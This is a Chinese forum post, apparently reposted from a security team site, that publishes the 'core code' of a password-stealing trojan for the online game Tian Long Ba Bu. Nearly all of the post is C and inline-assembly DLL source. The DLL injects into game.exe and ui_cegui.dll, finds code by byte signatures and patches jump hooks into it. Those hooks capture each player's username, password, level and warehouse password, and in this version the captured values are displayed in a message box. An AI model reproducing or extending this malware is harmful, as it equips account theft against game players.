天龙八部木马核心代码,版本0.50.0385

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:认真的雪

我也来凑凑热闹…..
发一个网游木马核心代码…无聊的时候写的..
截取了用户名,密码,等级,仓库密码

#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

DWORD ui_cegui;

void  *lpUserRet=NULL;
void  *lpGradeRet=NULL;
void  *lpStoreRet=NULL;

char user[40];
char pass[40];
char storePassWord[40];
DWORD dwGrade;

DWORD stroePath=0;
void _stdcall StroeUnhook();

void _stdcall HookStroe();
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}

DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);

for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{

*lpRet=(void*)buff;
return i+(DWORD)hModule;

}

}

return 0;

}

DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);

if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{

*lpRet=(void*)buff;
return i+(DWORD)hModule;

}

}
return 0;

}

void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);

return;

}

__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}

void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;

}

__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}

void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;

}

void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);

::MessageBox(NULL,data,"ok",0);

}
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];

}
}

void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);

MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;

}
void HookGrade()
{

DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);

}

void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();

return 0;
}

BOOL APIENTRY DllMain( HANDLE hModule,
DWORD  ul_reason_for_call,
LPVOID lpReserved
)
{

switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
DWORD ThreadId;
CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
break;
}

default:break;
}

return TRUE;
}

相关日志

发表评论